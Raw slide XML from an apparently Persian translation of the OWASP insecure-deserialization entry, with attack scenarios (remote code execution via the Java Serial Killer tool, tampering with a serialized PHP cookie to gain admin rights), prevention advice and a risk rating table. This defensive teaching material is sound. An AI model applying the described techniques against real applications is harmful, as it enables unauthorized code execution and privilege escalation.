            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">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حملات مرتبط با ساختار داده و داده ها، جایی که مهاجم منطق برنامه را تغییر می دهد یا اگر اشیاء موجود در برنامه وجود داشته باشد که می توانند رفتار را در طی یا بعد از دیسریالیزیشن تغییر دهند، اجرای کد دلخواه کد را اجرا می کند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">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حملات متداول دستکاری اطلاعات، مانند حملات مربوط به کنترل دسترسی، که در آن ساختار داده موجود استفاده می شود، اما محتوای تغییر یافته است.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سریالیزیشن </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ممکن است در برنامه های کاربردی برای:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="r" rtl="1">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ارتباطات از راه دور و بین فرایند (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>RPC / IPC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="r" rtl="1">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پروتکل های سیم، خدمات وب، کارگزاران پیام</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="r" rtl="1">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ذخیره سازی / پایداری</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="r" rtl="1">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پایگاههای داده، سرورهای ذخیره سازی، سیستم های فایل</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="r" rtl="1">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کوکی </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>HTTP، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>پارامترهای فرم </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>HTML، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نشانه های تأیید </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نمونه‌ سناریوهای حمله</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو # 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برنامه کاربردی </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>React، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>مجموعه ای از سرویس های خدمات میکرو </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Spring Boot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>را فراخوانی می کند. برنامه نویسان کاربردی، سعی کردند اطمینان حاصل کنند که کد آنها غیر قابل تغییر است. راه حل هایی که با آن روبرو می شوند، موقعیت کاربر را به صورت سریالی و هر درخواست به عقب و جلو منتقل می کند. یک مهاجم به امضای شی "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>R00" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اشاره می کند و از ابزار </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Java Serial Killer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برای به دست آوردن اجرای کد راه دور در سرور برنامه استفاده می کند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو # 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یک انجمن </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> با استفاده از پیاده سازی شیء به منظور ذخیره یک "سوپر" کوکی، حاوی شناسه کاربری کاربر، نقش، هش رمز عبور و حالت های دیگر استفاده می کند:</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pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یک مهاجم شیء سریالی را تغییر می دهد تا امتیازات مدیریت خود را به دست آورد:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRP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fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>منابع</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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fa-IR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>خارجی</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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>پیشگیری از حمله</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>تنها الگوی امن معماری، تشخیص اشیاء سریالی از منابع نامعتبر و یا استفاده از رسانه های سریالی که فقط نوع داده های اولیه را مجاز می شمارند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اگر این امکان پذیر نیست، یکی از موارد زیر را در نظر بگیرید:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">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اجرای چک های یکپارچه مانند امضاهای دیجیتالی بر روی هر شیء سریالی برای جلوگیری از ایجاد شیء خصمانه و یا دستکاری داده ها.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">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اجرای محدودیت های سخت نوع در طول </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>deserialization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>قبل از ایجاد شی به عنوان کد به طور معمول یک مجموعه قابل تعریف از کلاس انتظار می رود. دور زدن این تکنیک نشان داده شده است، بنابراین تنها تکیه بر این تکنیک توصیه نمی شود.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>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کد جدا سازی و اجرای کد که </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>deserializes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> در محیط های با دسترسی کم ممکن می شود.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>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استثنائات و خرابی هایی ورود </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>deserialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، از جمله مواردی که نوع ورودی نوع مورد انتظار نیست، یا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>deserialization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> استثنائات را حذف می کند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>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محدود کردن یا نظارت بر اتصال به شبکه های ورودی و خروجی از کانتینر و یا سرورهایی که </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>deserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> می شوند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>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نظارت بر </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>deserialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، هشدار در صورتی که یک کاربر به طور مداوم </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>deserializes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> می شود.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>نا امن</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>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1511280743"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836400" cy="23496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fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابلیت بهره‌برداری</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>۱</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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شیوع</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx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۲</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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابل کشف بودن</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1"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۲</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1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تکنیکی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0"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۳</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gn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>بهره برداری از </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> تا حدودی دشوار است، زیرا </a:t>
                      </a:r>
